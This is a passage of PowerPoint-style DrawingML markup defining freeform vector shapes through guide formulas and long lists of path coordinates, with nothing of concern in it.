                  <a:gd name="T58" fmla="*/ 0 w 189"/>
                  <a:gd name="T59" fmla="*/ 0 h 125"/>
                  <a:gd name="T60" fmla="*/ 0 w 189"/>
                  <a:gd name="T61" fmla="*/ 0 h 125"/>
                  <a:gd name="T62" fmla="*/ 0 w 189"/>
                  <a:gd name="T63" fmla="*/ 0 h 125"/>
                  <a:gd name="T64" fmla="*/ 0 w 189"/>
                  <a:gd name="T65" fmla="*/ 0 h 125"/>
                  <a:gd name="T66" fmla="*/ 0 w 189"/>
                  <a:gd name="T67" fmla="*/ 0 h 125"/>
                  <a:gd name="T68" fmla="*/ 0 w 189"/>
                  <a:gd name="T69" fmla="*/ 0 h 125"/>
                  <a:gd name="T70" fmla="*/ 0 w 189"/>
                  <a:gd name="T71" fmla="*/ 0 h 125"/>
                  <a:gd name="T72" fmla="*/ 0 w 189"/>
                  <a:gd name="T73" fmla="*/ 0 h 125"/>
                  <a:gd name="T74" fmla="*/ 0 w 189"/>
                  <a:gd name="T75" fmla="*/ 0 h 125"/>
                  <a:gd name="T76" fmla="*/ 0 w 189"/>
                  <a:gd name="T77" fmla="*/ 0 h 125"/>
                  <a:gd name="T78" fmla="*/ 0 w 189"/>
                  <a:gd name="T79" fmla="*/ 0 h 125"/>
                  <a:gd name="T80" fmla="*/ 0 w 189"/>
                  <a:gd name="T81" fmla="*/ 0 h 125"/>
                  <a:gd name="T82" fmla="*/ 0 w 189"/>
                  <a:gd name="T83" fmla="*/ 0 h 125"/>
                  <a:gd name="T84" fmla="*/ 0 w 189"/>
                  <a:gd name="T85" fmla="*/ 0 h 125"/>
                  <a:gd name="T86" fmla="*/ 0 w 189"/>
                  <a:gd name="T87" fmla="*/ 0 h 125"/>
                  <a:gd name="T88" fmla="*/ 0 w 189"/>
                  <a:gd name="T89" fmla="*/ 0 h 125"/>
                  <a:gd name="T90" fmla="*/ 0 w 189"/>
                  <a:gd name="T91" fmla="*/ 0 h 125"/>
                  <a:gd name="T92" fmla="*/ 0 w 189"/>
                  <a:gd name="T93" fmla="*/ 0 h 125"/>
                  <a:gd name="T94" fmla="*/ 0 w 189"/>
                  <a:gd name="T95" fmla="*/ 0 h 125"/>
                  <a:gd name="T96" fmla="*/ 0 w 18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9"/>
                  <a:gd name="T148" fmla="*/ 0 h 125"/>
                  <a:gd name="T149" fmla="*/ 189 w 18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9" h="125">
                    <a:moveTo>
                      <a:pt x="189" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189"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69" name="Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="479" y="2421"/>
                <a:ext cx="61" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 112"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 112"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 0 h 112"/>
                  <a:gd name="T6" fmla="*/ 0 w 187"/>
                  <a:gd name="T7" fmla="*/ 0 h 112"/>
                  <a:gd name="T8" fmla="*/ 0 w 187"/>
                  <a:gd name="T9" fmla="*/ 0 h 112"/>
                  <a:gd name="T10" fmla="*/ 0 w 187"/>
                  <a:gd name="T11" fmla="*/ 0 h 112"/>
                  <a:gd name="T12" fmla="*/ 0 w 187"/>
                  <a:gd name="T13" fmla="*/ 0 h 112"/>
                  <a:gd name="T14" fmla="*/ 0 w 187"/>
                  <a:gd name="T15" fmla="*/ 0 h 112"/>
                  <a:gd name="T16" fmla="*/ 0 w 187"/>
                  <a:gd name="T17" fmla="*/ 0 h 112"/>
                  <a:gd name="T18" fmla="*/ 0 w 187"/>
                  <a:gd name="T19" fmla="*/ 0 h 112"/>
                  <a:gd name="T20" fmla="*/ 0 w 187"/>
                  <a:gd name="T21" fmla="*/ 0 h 112"/>
                  <a:gd name="T22" fmla="*/ 0 w 187"/>
                  <a:gd name="T23" fmla="*/ 0 h 112"/>
                  <a:gd name="T24" fmla="*/ 0 w 187"/>
                  <a:gd name="T25" fmla="*/ 0 h 112"/>
                  <a:gd name="T26" fmla="*/ 0 w 187"/>
                  <a:gd name="T27" fmla="*/ 0 h 112"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 0 h 112"/>
                  <a:gd name="T30" fmla="*/ 0 w 187"/>
                  <a:gd name="T31" fmla="*/ 0 h 112"/>
                  <a:gd name="T32" fmla="*/ 0 w 187"/>
                  <a:gd name="T33" fmla="*/ 0 h 112"/>
                  <a:gd name="T34" fmla="*/ 0 w 187"/>
                  <a:gd name="T35" fmla="*/ 0 h 112"/>
                  <a:gd name="T36" fmla="*/ 0 w 187"/>
                  <a:gd name="T37" fmla="*/ 0 h 112"/>
                  <a:gd name="T38" fmla="*/ 0 w 187"/>
                  <a:gd name="T39" fmla="*/ 0 h 112"/>
                  <a:gd name="T40" fmla="*/ 0 w 187"/>
                  <a:gd name="T41" fmla="*/ 0 h 112"/>
                  <a:gd name="T42" fmla="*/ 0 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 112"/>
                  <a:gd name="T44" fmla="*/ 0 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 112"/>
                  <a:gd name="T46" fmla="*/ 0 w 187"/>
                  <a:gd name="T47" fmla="*/ 0 h 112"/>
                  <a:gd name="T48" fmla="*/ 0 w 187"/>
                  <a:gd name="T49" fmla="*/ 0 h 112"/>
                  <a:gd name="T50" fmla="*/ 0 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 112"/>
                  <a:gd name="T52" fmla="*/ 0 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 112"/>
                  <a:gd name="T54" fmla="*/ 0 w 187"/>
                  <a:gd name="T55" fmla="*/ 0 h 112"/>
                  <a:gd name="T56" fmla="*/ 0 w 187"/>
                  <a:gd name="T57" fmla="*/ 0 h 112"/>
                  <a:gd name="T58" fmla="*/ 0 w 187"/>
                  <a:gd name="T59" fmla="*/ 0 h 112"/>
                  <a:gd name="T60" fmla="*/ 0 w 187"/>
                  <a:gd name="T61" fmla="*/ 0 h 112"/>
                  <a:gd name="T62" fmla="*/ 0 w 187"/>
                  <a:gd name="T63" fmla="*/ 0 h 112"/>
                  <a:gd name="T64" fmla="*/ 0 w 187"/>
                  <a:gd name="T65" fmla="*/ 0 h 112"/>
                  <a:gd name="T66" fmla="*/ 0 w 187"/>
                  <a:gd name="T67" fmla="*/ 0 h 112"/>
                  <a:gd name="T68" fmla="*/ 0 w 187"/>
                  <a:gd name="T69" fmla="*/ 0 h 112"/>
                  <a:gd name="T70" fmla="*/ 0 w 187"/>
                  <a:gd name="T71" fmla="*/ 0 h 112"/>
                  <a:gd name="T72" fmla="*/ 0 w 187"/>
                  <a:gd name="T73" fmla="*/ 0 h 112"/>
                  <a:gd name="T74" fmla="*/ 0 w 187"/>
                  <a:gd name="T75" fmla="*/ 0 h 112"/>
                  <a:gd name="T76" fmla="*/ 0 w 187"/>
                  <a:gd name="T77" fmla="*/ 0 h 112"/>
                  <a:gd name="T78" fmla="*/ 0 w 187"/>
                  <a:gd name="T79" fmla="*/ 0 h 112"/>
                  <a:gd name="T80" fmla="*/ 0 w 187"/>
                  <a:gd name="T81" fmla="*/ 0 h 112"/>
                  <a:gd name="T82" fmla="*/ 0 w 187"/>
                  <a:gd name="T83" fmla="*/ 0 h 112"/>
                  <a:gd name="T84" fmla="*/ 0 w 187"/>
                  <a:gd name="T85" fmla="*/ 0 h 112"/>
                  <a:gd name="T86" fmla="*/ 0 w 187"/>
                  <a:gd name="T87" fmla="*/ 0 h 112"/>
                  <a:gd name="T88" fmla="*/ 0 w 187"/>
                  <a:gd name="T89" fmla="*/ 0 h 112"/>
                  <a:gd name="T90" fmla="*/ 0 w 187"/>
                  <a:gd name="T91" fmla="*/ 0 h 112"/>
                  <a:gd name="T92" fmla="*/ 0 w 187"/>
                  <a:gd name="T93" fmla="*/ 0 h 112"/>
                  <a:gd name="T94" fmla="*/ 0 w 187"/>
                  <a:gd name="T95" fmla="*/ 0 h 112"/>
                  <a:gd name="T96" fmla="*/ 0 w 187"/>
                  <a:gd name="T97" fmla="*/ 0 h 112"/>
                  <a:gd name="T98" fmla="*/ 0 w 187"/>
                  <a:gd name="T99" fmla="*/ 0 h 112"/>
                  <a:gd name="T100" fmla="*/ 0 w 187"/>
                  <a:gd name="T101" fmla="*/ 0 h 112"/>
                  <a:gd name="T102" fmla="*/ 0 w 187"/>
                  <a:gd name="T103" fmla="*/ 0 h 112"/>
                  <a:gd name="T104" fmla="*/ 0 w 187"/>
                  <a:gd name="T105" fmla="*/ 0 h 112"/>
                  <a:gd name="T106" fmla="*/ 0 w 187"/>
                  <a:gd name="T107" fmla="*/ 0 h 112"/>
                  <a:gd name="T108" fmla="*/ 0 w 187"/>
                  <a:gd name="T109" fmla="*/ 0 h 112"/>
                  <a:gd name="T110" fmla="*/ 0 w 187"/>
                  <a:gd name="T111" fmla="*/ 0 h 112"/>
                  <a:gd name="T112" fmla="*/ 0 w 187"/>
                  <a:gd name="T113" fmla="*/ 0 h 112"/>
                  <a:gd name="T114" fmla="*/ 0 w 187"/>
                  <a:gd name="T115" fmla="*/ 0 h 112"/>
                  <a:gd name="T116" fmla="*/ 0 w 187"/>
                  <a:gd name="T117" fmla="*/ 0 h 112"/>
                  <a:gd name="T118" fmla="*/ 0 w 187"/>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7"/>
                  <a:gd name="T181" fmla="*/ 0 h 112"/>
                  <a:gd name="T182" fmla="*/ 187 w 187"/>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7" h="112">
                    <a:moveTo>
                      <a:pt x="0" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="53"/>
                    </a:lnTo>
